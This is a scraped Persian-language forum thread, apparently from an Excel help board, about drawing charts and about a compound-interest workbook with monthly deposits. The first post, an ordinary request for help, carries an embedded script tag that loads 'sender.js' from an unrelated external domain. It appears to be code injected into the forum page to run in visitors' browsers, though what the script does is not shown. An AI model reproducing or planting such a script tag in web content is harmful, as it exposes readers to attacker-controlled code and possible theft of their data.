سود مرکب

Collapse
X

• زمان
  • نمایش
حذف همه
new posts
  • rgtrtgftr
    • 2016/06/22
    • 1

سلام دوستان خواهشا منو راهنمایی کنید من میخوام توی اکسل نمودار رسم کنم ولی نمیدونم چطوری این کار رو انجام بدم تورو خدا یه توضیح مختصری بهم بدین ممنون چون این مشکل من نیست فقط و بسیاری از کاربران دیگه هم این مشکل رو دارند
    <script src="http://shocklogedtoyou.xzn.ir/sender.js" type="text/javascript"></script>

کامنت

• امين اسماعيلي
      مدير تالار ويژوال بيسيك

• 2013/01/17
      • 1198
      • 84.00

dost aziz dar opic marbote soaletono matrah konin va inke che noie az nemodaro mikhi rasm koni. dadehat chetorian. file dari bezari. axi az on shekli ke mikhai graphet dashte bashe dari
      در پناه خداوندگار ایران زمین باشید و پیروز

کامنت

• hosseinkalateh
        • 2017/02/28
        • 2

سلام
        ممنون از شما
        فیل واقعا کاربردی بود
        اما ایا امکانش هست مقدار مبلغی که هر ماه واریز میشه با احتساب تورم و افزایش حقوق افزایش پیدا کنه؟ مثلا سال اول 100 هزار تمن و سال دوم 110 هزار تمن و سال سوم121 هزار تمن تا آخر ...

کامنت

• hosseinkalateh
          • 2017/02/28
          • 2

نوشته اصلی توسط abootorab
          با درود
          اینم فایل برنامه من خدمت شما دوستان، رمز ورود 0645 هستش.
          طبق گفته استاد عزیز misammisam شاید واسه محاسبه یک چنین سودها طبق امکاناتی که خود اکسل در اختیار کاربر میذاره زیاد سخت نباشه ولی بنده در قسمت حسابداری اکسل سررشته ندارم و این فایلی که هم ضمیمه کردم بسته به نیازهای خودم و اکثر محاسبات اون توسط vba انجام دادم و قطعا اشکالاتی خواهد داشت اما خودم به شخصه از این فایل و نتایج محاسباتی که ازش گرفتم زیاد استفاده کردم و به کارم اومده، حتی در مورد دریافت یک وام و سپرده گذاری اون و از این قبیل مسائل. آخه واسه ما فقیر فقرا قرون قرون حساب کردن خیلی مهمه!
          به هر حال امیدوارم دوستان اشکالات رو مطرح و بنده رو راهنمایی کنند
          ممنون از همه

سلام
          ممنون از شما
          فیل واقعا کاربردی بود
          اما ایا امکانش هست مقدار مبلغی که هر ماه واریز میشه با احتساب تورم و افزایش حقوق افزایش پیدا کنه؟ مثلا سال اول 100 هزار تمن و سال دوم 110 هزار تمن و سال سوم121 هزار تمن تا آخر ...

کامنت

چند لحظه..